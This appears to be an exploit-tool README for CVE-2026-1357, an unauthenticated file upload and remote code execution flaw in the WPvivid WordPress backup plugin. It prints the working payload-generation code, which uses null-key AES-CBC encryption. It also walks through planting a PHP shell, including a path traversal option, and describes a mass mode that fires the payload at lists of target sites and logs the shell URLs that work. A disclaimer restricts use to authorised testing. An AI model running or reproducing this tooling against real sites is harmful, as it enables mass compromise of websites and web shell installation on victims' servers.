## https://sploitus.com/exploit?id=56A8832B-D1BC-58CA-B8BF-2A87BA6E0468
# ๐งจ CVE-2026-1357 โ WPvivid Null-Key Exploit Tool (`CVE-2026-1357.py`)
**Migration, Backup, Staging โ WPvivid Backup & Migration โค 0.9.123**
**Vulnerability:** Unauthenticated Arbitrary File Upload โ Remote Code Execution
**CVE:** `CVE-2026-1357` โ **CVSS 9.8 (Critical)**
**Author:** **Nxploited (Khaled Alenazi)**
**GitHub:** `https://github.com/Nxploited`
**Telegram:** [`@KNxploited`](https://t.me/KNxploited)
---
## ๐งฌ What This Script Does
`CVE-2026-1357.py` is a **proof-of-concept exploitation tool** for the WPvivid vulnerability. It focuses on the flawed AES session handling that allows an attacker to:
1. Encrypt a payload with a **null AES key/IV** (all zero bytes) in the same format WPvivid expects.
2. Embed arbitrary file content (e.g., PHP shell) and a chosen filename/path (`name`) into the payload.
3. Send this payload to the WPvivid endpoint via the `wpvivid_action=send_to_site` parameter.
4. (Optionally) verify whether the file was successfully written and is accessible.
The script does **not** attempt to guess or abuse private keys directly. Instead, it simulates WPvividโs broken flow where a failed `openssl_private_decrypt()` leads to phpseclibโs AES cipher being initialized with a null-key.
---
## ๐ง Technical Internals
### ๐ AES Null-Key Payload
The core of the exploit is in `gen_wpvivid_payload()`:
- It builds a JSON structure:
```json
{
"name": "",
"offset": 0,
"data": "",
"file_size": ,
"md5": ""
}
```
- It serializes this JSON (compact form, no spaces).
- It encrypts the JSON using:
- `AES-128-CBC`
- `key = b"\x00" * 16`
- `iv = b"\x00" * 16`
- It then prepends:
- 3 bytes: `"000"` (a static length field placeholder).
- 16-byte uppercase hex: cipher length encoded as `"{len(cipher):016X}"`.
- The final encrypted blob is:
```text
"000" + +
```
- This blob is base64-encoded and returned as the final `wpvivid_content` value.
Function:
```python
def gen_wpvivid_payload(file_name: str, file_bytes: bytes) -> str:
file_md5 = hashlib.md5(file_bytes).hexdigest()
json_obj = {
"name": file_name,
"offset": 0,
"data": base64.b64encode(file_bytes).decode(),
"file_size": len(file_bytes),
"md5": file_md5,
}
json_str = json.dumps(json_obj, separators=(",", ":")).encode()
cipher = AES.new(NULL_KEY, AES.MODE_CBC, NULL_IV)
encrypted = cipher.encrypt(pad(json_str, AES.block_size))
key_len_field = b"000"
cipherlen_field = f"{len(encrypted):016X}".encode()
blob = key_len_field + cipherlen_field + encrypted
return base64.b64encode(blob).decode()
```
This matches the WPvivid decryption expectations in the vulnerable code path after RSA decryption failure.
---
## ๐งฐ Features & Modes
The script has **two main modes** plus a mass-testing capability:
1. `mood1` โ **Payload Generator**
- Generates a valid `wpvivid_content` value using the null-key trick.
- Supports multiple ways of defining the file content.
- Optionally launches **Mass Tester** against a list of targets.
2. `mood2` โ **Single Target Tester**
- Uses a previously generated payload.
- Tests a **single** target end-to-end:
- Sends the payload.
- Constructs the expected resulting file URL.
- Verifies if the file is reachable.
3. **Mass Mode** (from `mood1`)
- Sends a chosen payload to **multiple targets** from a list file.
- Uses concurrency and a progress bar.
- Tracks and logs successful uploads.
---
## ๐ฆ Running the Script
```bash
python3 CVE-2026-1357.py
```
You will see a **Rich-based UI** with a banner and mode selection:
- `mood1` โ Payload Generator
- `mood2` โ Single Target Tester
---
## ๐งช Mode: mood1 โ Payload Generator
### Purpose
- Create an exploit payload (`wpvivid_content`) that encodes:
- The **file path/name** you want WPvivid to write.
- The **file content** (shell, test file, etc.).
### Flow
1. **Mode selection**
When prompted:
```text
Choose mode (mood1/mood2) [mood1]:
```
Press `Enter` (defaults to `mood1`) or type `mood1`.
2. **Target filename / path**
You are asked for:
```text
Target file name (e.g., Nx_.php or ../../public/Nx_.php):
```
Examples:
- To drop a file into the WPvivid backup directory:
```text
Nx_.php
```
- To abuse directory traversal (if allowed by the target):
```text
../../public_html/Nx_.php
```
The value goes into the `name` field of the JSON payload.
3. **Content input mode**
The script displays three ways to define the file content:
- **Mode 1**: single-line content.
- **Mode 2**: multi-line content (ends with `EOF`).
- **Mode 3**: read from a local file (e.g. `shell.php`).
You are prompted:
```text
Mode [1/2/3] [1]:
```
- **Mode 1 โ Single line**
```text
Single line content:
```
Input example:
```text
EOF
```
- **Mode 3 โ Local file**
```text
Local file path (e.g., shell.php):
```
The script reads the entire file into `file_bytes`.
4. **Payload generation**
Once the content is captured, the script:
- Builds the JSON object.
- Encrypts it with null-key AES-CBC.
- Wraps the binary blob.
- Base64-encodes it.
You see output like:
```text
Payload generated.
Use the value after '=' as wpvivid_content.
wpvivid_content=BASE64_BLOB_HERE
```
And a file `wpvivid_payload.txt` is written:
```text
file_name=Nx_.php
wpvivid_content=BASE64_BLOB_HERE
```
### Optional: Mass Mode from mood1
After generating the payload, the script asks:
```text
Auto-send this payload to targets list (mass mode)? (y/N):
```
If you answer `y`, it starts **mass mode** with the payload and filename you just created.
---
## ๐ Mass Mode โ Multiple Targets
### Purpose
- Take a **single exploit payload** and test it against a **list of targets**.
### Flow
1. **Targets file**
Example prompt:
```text
Targets list file (one URL per line):
```
Expected format of file (e.g. `targets.txt`):
```text
https://site1.com
site2.com
http://site3.net
```
The script will automatically normalize base URLs (adding scheme where missing).
2. **Thread count**
```text
Threads (concurrent sites) [5]:
```
Controls how many sites are processed in parallel.
3. **Per-target logic**
For each target:
- Normalize URL โ `base_url`.
- Call:
```python
send_wpvivid_payload(base_url, payload)
```
which:
- Builds `wpvivid_action=send_to_site` + `wpvivid_content=` POST.
- Sends via a fresh session with tuned connection pool settings.
- Checks if the response contains `{"result":"success"}` (compact form check).
- If upload is considered successful:
- Construct `shell_url` as:
```python
f"{base_url}/wp-content/wpvividbackups/{file_name.lstrip('/')}"
```
- Save it to `Nx_.txt`.
- Attempt `verify_written_file()`:
- Requests `shell_url` with GET.
- If `status_code == 200`, marks as verified.
- If any errors occur:
- The script classifies the reason via `short_reason()`:
- TIMEOUT / SSL / 404 / 403 / CONN / REQUEST / VERIFY / ERROR.
4. **UI**
- Rich progress bar shows global progress and elapsed time.
- Each site prints:
- `[OK] ` on success.
- `[FAIL] (reason: ...)` on error.
- `[!] Not verified (...)` when upload may have succeeded but verification failed.
---
## ๐งช Mode: mood2 โ Single Target Tester
### Purpose
- Use an existing payload (from `wpvivid_payload.txt` or external source) against a **single URL**, and verify resulting file.
### Flow
1. **Target URL**
Prompt:
```text
Target base URL (e.g., https://site.com):
```
Example:
```text
https://victim.com
```
The script normalizes this to a base like:
```text
https://victim.com
```
2. **File name**
Prompt:
```text
Expected file name (e.g., Nx_.php):
```
This is the name/path **you expect** WPvivid to write (matching what you encoded in the payloadโs `name` field).
3. **Payload input**
Prompt:
```text
Paste wpvivid_content payload (base64 or 'wpvivid_content=...'):
```
- If you paste a full line starting with `wpvivid_content=...`, it strips the prefix.
- If you paste only the base64, it takes it as is.
4. **Execution**
The script:
- Sends the POST with `wpvivid_action=send_to_site` + your `wpvivid_content`.
- If the response suggests success, it constructs:
```text
/wp-content/wpvividbackups/
```
and prints `[OK]` with that URL.
- Appends successful URLs to `Nx_.txt`.
- Attempts verification via `verify_written_file()` and prints the result.
This mode is ideal for **manual / lab testing** of a single site with fine control over the payload.
---
## ๐ Output Files
- **`wpvivid_payload.txt`**
- Written in `mood1`.
- Stores:
- `file_name=`
- `wpvivid_content=`
- **`Nx_.txt`**
- Written by `mood1` (mass mode) and `mood2`.
- Contains one **successful file URL per line** where upload appears to have succeeded (and optionally verified).
---
## โ ๏ธ Disclaimer
This tool is intended **solely for**:
- Security research in controlled environments.
- Testing systems **you own** or **have explicit, written permission** to test.
- Validating remediation and detection measures for CVE-2026-1357.
By using this script, you agree that:
- You are responsible for complying with all applicable laws.
- You will **not** use it on systems without proper authorization.
- The author (Nxploited) bears **no responsibility** for any misuse, damage, legal issues, or incidents arising from the use of this tool.
Use it **at your own risk** and **only for legitimate security testing**.
---
## โ๏ธ Author & Contact
- **By:** `Nxploited` (Khaled Alenazi)
- **GitHub:** `https://github.com/Nxploited`
- **Telegram:** [`@KNxploited`](https://t.me/KNxploited)
For updates, tools, and security research content, follow the Telegram channel:
๐ **[`@KNxploited`](https://t.me/KNxploited)**